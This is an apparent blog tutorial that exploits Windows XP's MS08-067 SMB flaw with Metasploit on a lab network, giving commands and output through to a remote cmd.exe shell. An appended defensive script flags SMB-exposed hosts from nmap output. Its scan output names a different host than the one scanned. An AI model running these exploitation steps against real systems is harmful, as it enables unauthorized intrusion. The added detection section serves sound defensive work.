Friday, 27 January 2012

How to exploit Windows XP with Metasploit

1.      First ping the Windows IP address:
ping 192.168.56.101
root@bt:~# ping 192.168.56.101
PING 192.168.56.101 (192.168.56.101) 56(84) bytes of data.
64 bytes from 192.168.56.101: icmp_seq=1 ttl=128 time=4.41 ms
64 bytes from 192.168.56.101: icmp_seq=2 ttl=128 time=0.633 ms
64 bytes from 192.168.56.101: icmp_seq=3 ttl=128 time=0.711 ms

2.      Scan the host for open ports:
nmap 192.168.56.101
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 00:09 WIT
Nmap scan report for 192.168.56.1
Host is up (0.000011s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
902/tcp open  iss-realsecure
Nmap done: 1 IP address (1 host up) scanned in 13.26 seconds

3.      Start Metasploit:
msfconsole

4.      Choose the exploit module:
msf> use windows/smb/ms08_067_netapi

5.      Choose the payload:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

6.      Set the Windows IP address as the target:
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101

7.      Then run the exploit:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:33119 -> 192.168.56.101:4444) at 2012-01-28 00:36:19 +0700

8.      If a session opens as shown above, the exploit worked and you get a Meterpreter prompt:
meterpreter>

9.      Finally, run a command shell on the target:
meterpreter> execute -M -f cmd.exe -i

10.  The result is:
Process 1728 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
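The exploit in steps 4 to 7 only works because the host exposes the SMB/NetBIOS ports (139 and 445) found by the scan in step 2 and is missing the MS08-067 update for the Server service. The following script is an added example, not part of the original post, written from the defender's side: it parses Nmap's normal text output (the format shown in step 2, which is embedded below as the sample) and lists every host that exposes SMB over TCP, so the patch level and firewall rules of those hosts can be checked. The function names and the regular expressions are my own.

```python
import re

# Sample input: the Nmap output printed in step 2 of this post, copied verbatim.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 00:09 WIT
Nmap scan report for 192.168.56.1
Host is up (0.000011s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
902/tcp open  iss-realsecure
Nmap done: 1 IP address (1 host up) scanned in 13.26 seconds
"""

# TCP ports of the NetBIOS session / SMB services that MS08-067 is reached through.
SMB_PORTS = {139, 445}

# "Nmap scan report for <host>" starts a new host section in normal output.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# "<port>/<proto> <state> <service>" lines follow the PORT STATE SERVICE header.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text):
    """Parse Nmap normal output into {host: [(port, proto, state, service), ...]}."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current].append((int(port), proto, state, service))
    return hosts


def smb_exposed_hosts(hosts):
    """Return {host: sorted open SMB TCP ports} for every host exposing 139 or 445."""
    findings = {}
    for host, ports in hosts.items():
        open_smb = sorted(
            port for port, proto, state, _service in ports
            if proto == "tcp" and state == "open" and port in SMB_PORTS
        )
        if open_smb:
            findings[host] = open_smb
    return findings


if __name__ == "__main__":
    report = parse_nmap(SAMPLE_NMAP_OUTPUT)
    for host, ports in smb_exposed_hosts(report).items():
        print(f"{host}: SMB reachable on tcp {ports} - "
              "confirm the MS08-067 update is installed and restrict these ports")
```

Only ports reported as `open` count; a `filtered` 445/tcp means a firewall already sits in front of the service and the host is not listed. Applying the MS08-067 update and blocking 139/445 from untrusted networks removes the path this post's exploit uses.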

1 comment:

  1. Why are you not using Nessus to find VA?
    Please edit your report!

    -=IS2c=-